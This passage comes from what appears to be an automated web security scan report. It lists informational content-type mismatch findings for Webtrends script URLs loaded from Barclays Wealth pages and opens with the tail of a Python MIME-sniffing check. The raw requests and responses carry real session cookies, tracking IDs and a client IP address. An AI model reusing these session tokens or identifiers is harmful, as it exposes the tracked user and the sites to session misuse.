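    mime = headers.get("content-type", "").split(";", 1)[0].strip().lower()
    declared = MIME_FAMILY.get(mime, "unknown")
    sniffed = sniff_body(body)
    return {
        "declared_mime": mime,
        "declared": declared,
        "sniffed": sniffed,
        "mismatch": "unknown" not in (declared, sniffed) and declared != sniffed,
        "nosniff": headers.get("x-content-type-options", "").lower() == "nosniff",
    }
```

Run check_content_type(SAMPLE_RESPONSE) to reproduce the finding with a sniffed family of "javascript" and nosniff False; run it on REPORT_HEADERS + TRUNCATED_BODY to see that the comment-only body the report shows is classified "unknown", which is the honest verdict for what the scanner actually had in hand. The mismatch only becomes a blocking problem once nosniff is added, so check both together before recommending the header on a site that serves its scripts this way.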
28.65. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2acefe3a91f4bce4a535901afd613eb60454f94b522ae5a0f92f493ea819c172569003b3b509f70f9aa24b28c9cf18bd706efe47c3f107ad579e17c40820ea7d59a73ecc0eda6324f0e772cd4dac1acc2f3c2c715f94f6c6b2c43b6d93e0b9de8bcdf8dfa4b5163d49b4cecec1895d4011d61c3d1d8301890b0122218051c14dfda0b1fa50b53a5c57e46e2206617f97330e60312ff4b22c719037281a32451b6c03c6c349c599a4e47ae3017e8a76e43e41167a6fe9b7be30030f4013e12cd9e395ad1bdc1d009a8a2413fa43c24609a524fd930fc9a171fed4e5610d4234e974a0fd4e2c6c04779992691c4b8b62cdf3fa2bed81c19933ff0285010f665f2dccd90735341116e1b45d141b87ac89150a13e6b1e44b8456ac111cddceba90ec6f572f05b14f902e092134a551b7659984fd9b0d3e6ff8549e55d2c4f1acab1a7c41315ae693139b015aeda9d916bccefe268c87ae8370104ab216424f6b05635a27e865f23ba918e6765327398632c66210880e14d920714634ee0e278e5c575e979ed70fa30591e653e7dec1bab67d01f739e085a53186283353d6b5484bfb6f042aae564f67f3ab069ebcb0ed1db275371d8804039621c3d0fd96fec5706fb0ea1a49c19523d6a84f9321f3d900393f7d41e52995
adf5d52fe17039304c456396481d1e49dace94e56a6027d2c0195ad86e47e588d47e3f37d227744aa3a98790ad4024c38176c6d2d2766f2a5081ba0ae048df7dc2f816f6a519c715ffa290f98202a531a1c6c28d8f4eaddf44fb79f8409c8b6763b513b3804dd447fe3ff1ba45e3b16244d2ef7115e3271dc0fc857ca002d000ef252a67b2e658db2c1312f56fc51abde481809fae009f051222bc3f75f269c9e10f4f76103f9804639ff9a55932ae179bc1f2d6079c351ea5f4d99bdd77f780752e3d4bd8856960db4fb7291b054e9cd9

Issue detail

The response contains the following Content-type statement: Content-Type: text/html;charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2acefe3a91f4bce4a535901afd613eb60454f94b522ae5a0f92f493ea819c172569003b3b509f70f9aa24b28c9cf18bd706efe47c3f107ad579e17c40820ea7d59a73ecc0eda6324f0e772cd4dac1acc2f3c2c715f94f6c6b2c43b6d93e0b9de8bcdf8dfa4b5163d49b4cecec1895d4011d61c3d1d8301890b0122218051c14dfda0b1fa50b53a5c57e46e2206617f97330e60312ff4b22c719037281a32451b6c03c6c349c599a4e47ae3017e8a76e43e41167a6fe9b7be30030f4013e12cd9e395ad1bdc1d009a8a2413fa43c24609a524fd930fc9a171fed4e5610d4234e974a0fd4e2c6c04779992691c4b8b62cdf3fa2bed81c19933ff0285010f665f2dccd90735341116e1b45d141b87ac89150a13e6b1e44b8456ac111cddceba90ec6f572f05b14f902e092134a551b7659984fd9b0d3e6ff8549e55d2c4f1acab1a7c41315ae693139b015aeda9d916bccefe268c87ae8370104ab216424f6b05635a27e865f23ba918e6765327398632c66210880e14d920714634ee0e278e5c575e979ed70fa30591e653e7dec1bab67d01f739e085a53186283353d6b5484bfb6f042aae564f67f3ab069ebcb0ed1db275371d8804039621c3d0fd96fec5706fb0ea1a49c19523d6a84f9321f3d900393f7d41e52995adf5
d52fe17039304c456396481d1e49dace94e56a6027d2c0195ad86e47e588d47e3f37d227744aa3a98790ad4024c38176c6d2d2766f2a5081ba0ae048df7dc2f816f6a519c715ffa290f98202a531a1c6c28d8f4eaddf44fb79f8409c8b6763b513b3804dd447fe3ff1ba45e3b16244d2ef7115e3271dc0fc857ca002d000ef252a67b2e658db2c1312f56fc51abde481809fae009f051222bc3f75f269c9e10f4f76103f9804639ff9a55932ae179bc1f2d6079c351ea5f4d99bdd77f780752e3d4bd8856960db4fb7291b054e9cd9 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/debit-cards.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4B58DD7DB5603E2D9048FE4EA69A8782; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc200599559; _wt.control-79569-ta_11ApplyNowStep2ABn=f4be6fb10e561e19b362e17be8e54985a21e7d8c08da7565c9f725264895b2de21195dd232f468eb32a502163635a3366bc906e51ea492f77d4072456b73d3258873d1d51fd5a6e43f8c56ecc851bb0bfa65887ddf50cc1df578ccf8210063e053; _wt.mode-79569=fcdcc722e9320537bb59

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:15 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=A3D550880A45CA7718800D08622321F7; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.66. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The response contains the following Content-type statement: Content-Type: text/html;charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/barclays-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=366C424481F456C6E4820AE57695F69C; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a05651019; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d01953baa; _wt.mode-79569=fcdcc722e93200feed40

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:13 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=461B874546EDC251C6A7440F7F10048D; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.67. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The response contains the following Content-type statement: Content-Type: text/html;charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/important-information.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E7131C81E64A38E81B17329B424FCCDB; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a04d7d1af; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d0406738a; _wt.mode-79569=fcdcc722e93204194090

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:15 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=DE896946856589AC32A1D6B5BBB2DDE9; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.68. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The response contains the following Content-type statement: Content-Type: text/html;charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d504097faad25255cec6b40eabb0a73969b9191a1b0b56e0819b7c5c17493824c1c009d8f47b361528f0865b488d231cbd11e21882470726c934d925a847ee70d6830875c82c9e230ae96c2766431d6937f93af6262220e119b3bee6ba16b4a63e47e58b7bf227bdaa0d4f48cae5d4a8899929800359cbb942ecfd786c6b3b7c9b9d6beab379bb9255c9a5fe8cf73e1c74d2403c82007f4ce8e7155fe448544219b56259b7734531e4331c25430aa00ccc6dc918ffb4a9f17c06cdab90d79e589b5aa968ba091b9ff920254551b55e00459fc6f1d9987458df9cfe29e0185fa41759b68dc15bd0f741db3b14439310ebcb5b6cd685a7830ed9a2a91c653859cd8642eb09ac40219a1e342aabab7f91b0feafe6288912fb6630a1074fa747066dfee1c7450d28f14bd12e449440a9a267cd18dcab536b91de19a2256fa940c6aa08f40c900dc11f28f2301bfa3f8b1a9b7c309aa436865cec1adf3b38207c5c99e4caf1913c3d90e3ecdddf98a9dfacb2403e48b0cfcec2dd5e1447844f3c1785048c585326758451981aa0a7b3f558b5310856b26c2652342a96300d63602ea2eb717b933a244d3612423905c2c01ecbcaf0e528b35e7e8e23b16f15417969bcb2bf3202081f10ec2980e6c7af44dd1657cedc7013fe43c01c0ea871aac1509ea625fc8be26a0a4260e975f1a61c7e680d77cf963c4f46836e9da7a76ff497f0ac58da30f7140127057bdd91435f52005abdb319170e85e189415914ebb2e640855ce1154ad5cdbccae46e5d201fb84c982e587a3cfb0cb02dcb85fc9c006330a15d9c59cfc482f9806b6a5a324cb6c65d87185bf6aed015f99c902088ffe7cb245f26f1434e647b013c7847bc65f93be003801845666699759a7343910b11db26751e34ef00749054185cdddec557f040d3f21cf1b780aba02c5bab28aa89fa29d022335789a0041993670759e713402e85f340fcabedfe4cca51690a8a405794719783a8c7acc22c63e3e8484bcc947484fc1fc724f48b593a392f4de57e95adfd
827db32e6d3647403ac24b4f4e4cd79f92ee6d6272dec1115b883f15b788dc78653481207f4da0fd8295a01022c8d127c3d0d323612a5484bb5eb11ada2e95fe17f5f04dc341a8a794f48202a633f294d0969f25ef9d08a125f8168389666eb419f58b0b8715fc38a7ec41b4e06811d8bc7647b77c469cf99632e065e639c8435c7db0f355db685b5feb01ecb7cd HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/about-us/corporate-social-responsibility.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=436AD3879C2C3E6CD9AACE2057A0AD3B; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc2008dfa14; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d042f457f; _wt.mode-79569=fcdcc722e93202d188d0

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:05 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=93530B2177889BE5371E306CA55F4229; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.69. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The response contains the following Content-type statement: Content-Type: text/html;charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fc2253380d08e93542b96517e511b5024aa3b75cd09538917af6b539c67155cac21e5eaadebfa5c165966f3e8d64be9cc11e428ada21d52b941f155f2c7fd5ae51c72d1b6b3fc444ba911dd0eb36d00226bba2f1f07043b7d373af140c3d72e4ce9144f477f144dbbe2aa0a5502146af4c2da51ea9c097ecf8bdcc40c98492ffab552a828d98a0001e5ea4bebef45674d82504d813ae8f15cb47e034cff9831fb8a133e7bdf048e0529a29fdffb5fc507e1dd3d8224f0e7535247816ab7e2f3128e700fdaf677311b3bc03c8657a9892b68b7c936edb741a0703e3af0eb8e2f7769510c8d5688d58f19841a0fb443c9a37f184cf67d2d5f865902b6e97f0c62d150dc223387a7b4dd74dc50ebc4d007b9aa2db30b1075522b07f21aa49a62d2fd02d7b633a85ff89adac9b6f154ca2ede7288f351de7ddeb9b3f16a355edb81c0585f70898ca895aa2e049338708cd59e1c09515a8f11349b5c7eb78c6bd0b3060afdda24afa1ff5891ccd145c58445ad5b0528b0cc517a5de32ad9e64448451e83742d05d3d1af419a181c0d0ce8a4bd4abf8fb42f71901fe35b33672819331528c438f8bf1eec29865a379a739e9a41a8949f42cf47e07fea1573dea5ef78b66d84e27628451c6ce1534c404e2db34066a99d16d913ec2824d076b25853482578dc692e7eb0cab571b23e85f3ba9659f21842675cfe1f8b03dfad10b2eb250fa534e03a7ffb9a0c64777719b2929360bd43585b5887b09064e7d77a84066bb4a72e4cee5b950cc10aa786ce7e8c4deeafdfa43d52fa5106c3529e2ba7d6f5ef2265a17b4ea2b3ec190f8f6f2e75877beba742ebd7c0895fa47a1f03e78ac239aa93b8895698c112c5114fa8eaa7257e13442abfaf3323cc0f05a5224b7eaa494e37fdcf062c28741867e111f466cdf056867b6349b074432844bffd0a13cefc01c33436c4c7
af66460b02cf60df7e139f815a7fc29453e99f5d9a3d648a226df3e31e81910dd1950506b7a0df6a3d3c16c4fe58db28d496bacb65a09449235004d8490d51ba17347b8de5c9e3cd01d2f3e49aba552de700136f3f HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/private-banking.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=699E9E21874BEC698EE100FEE3749834; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c73ae63744334ae8cef4967d1912276c4668924ff5e00a6078cb239e3f1b573242cbd9b707a451092fc680a56b548caeb5a3f96f49b427787e772f8662a4191929dc9447c4758dd37c9d02690b0b; _wt.mode-79569=fcdcc722e932047ca940; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a025a8920

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:06 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=DD03FBD6C5716741DEF4FC9264E5B178; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02b1d29a; Expires=Sun, 01-Jan-2012 00:02:07 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=04434c6e; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93202cf02d7; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.70. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The response contains the following Content-type statement: Content-Type: text/html;charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/international-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=46EC8A693A8B058A0B9D418F6DDAF0B4; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d01953baa; _wt.mode-79569=fcdcc722e93201eda062; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc200599559

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:13 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=4B58DD7DB5603E2D9048FE4EA69A8782; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=f4be6fb10e561e19b362e17be8e54985a21e7d8c08da7565c9f725264895b2de21195dd232f468eb32a502163635a3366bc906e51ea492f77d4072456b73d3258873d1d51fd5a6e43f8c56ecc851bb0bfa65887ddf50cc1df578ccf8210063e053; Expires=Sun, 01-Jan-2012 00:02:13 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=024cc5f8; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e9320537bb59; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.71. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The response contains the following Content-type statement: Content-Type: text/html;charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/international-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
